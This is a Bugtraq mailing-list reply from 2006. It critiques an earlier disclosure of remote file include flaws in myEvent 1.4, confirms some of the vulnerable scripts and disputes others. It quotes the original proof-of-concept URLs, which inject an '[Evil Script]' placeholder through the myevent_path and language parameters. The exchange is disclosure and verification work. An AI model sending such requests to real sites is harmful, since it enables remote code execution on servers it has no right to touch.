Bugtraq mailing list archives
Re: myEvent <= 1.4 Multiple Remote File Include Vulnerabilities
From: "Carsten Eilers" <ceilers-lists () gmx de>
Date: Sun, 13 Aug 2006 14:31:44 +0200
sh3ll () sh3ll ir schrieb am Sat, 12 Aug 2006 10:03:15 +0000:
-------------admin.php-------------------------------------- .... <?php include_once($language); ?> ...
Take a look at config.php: $language = "lang_eng.php"; an at admin.php: <? include "config.php"; include_once('includes/template.php'); include_once($language); $template = new Template('templates/') ; Ups... :-)
-------------event.php--------------------------------------
This one works. BTDT.
-------------initialize.php-----------------------------------
This one works, too.
-------------myevent.php------------------------------------
Have you even tried to run this script? | Parse error: parse error in XXXXXX/myevent/myevent.php on line 4 Missing ; in line 3: | $myevent_path ="" Oh oh...
-------------viewevent.php-----------------------------------
This one works, too.
PoC: ~~~ http://www.target.com/[myEvent]/admin.php?language=[Evil Script] http://www.target.com/[myEvent]/event.php?myevent_path=[Evil Script] http://www.target.com/[myEvent]/initialize.php?myevent_path=[Evil Script] http://www.target.com/[myEvent]/myevent.php?myevent_path=[Evil Script] http://www.target.com/[myEvent]/viewevent.php?myevent_path=[Evil Script]
Did you test all of them? That way? I don't think so. Regards Carsten -- Dipl.-Inform. Carsten Eilers IT-Sicherheit und Datenschutz <http://www.ceilers-it.de>
Current thread:
- myEvent <= 1.4 Multiple Remote File Include Vulnerabilities sh3ll (Aug 12)
- Re: myEvent <= 1.4 Multiple Remote File Include Vulnerabilities Carsten Eilers (Aug 14)